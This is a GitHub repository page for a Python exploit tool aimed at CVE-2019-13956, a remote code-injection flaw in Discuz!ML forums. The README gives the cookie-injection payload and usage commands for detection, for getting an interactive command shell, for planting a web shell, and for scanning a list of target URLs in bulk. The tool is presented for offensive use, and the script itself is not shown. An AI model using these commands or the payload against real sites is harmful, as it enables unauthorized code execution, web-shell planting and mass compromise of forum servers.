Skip to content

Jungl3b00k/Discuz_RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
discuz_mlRce.py
discuz_mlRce.py
 
 
requirements.txt
requirements.txt
 
 
urls.txt
urls.txt
 
 

Repository files navigation

Discuz ML RCE
CVE ID : CVE-2019-13956
URL: https://www.esoln.net/blog/2019/06/14/discuzml-v-3-x-code-injection-vulnerability/
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-13956
CVE Mitre : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13956


Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used).


Installation


python2.7
pip -r requirements.txt

Help

python discuz_mlRce.py -h

Vulnerability Detection

python discuz_mlRce.py -u "http://www.example.cn/forum.php"

GETTING Command Shell

python discuz_mlRce.py -u "http://www.example.cn/forum.php" --cmdshell

GETTING Shell URL

python ddiscuz_mlRce.py -u "http://www.example.cn/forum.php" --getshell

Scanning List of URL

python discuz_mlRce.py -f urls.txt

About

Discuz!ML RCE

Topics

discuz discuzx discuzml

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages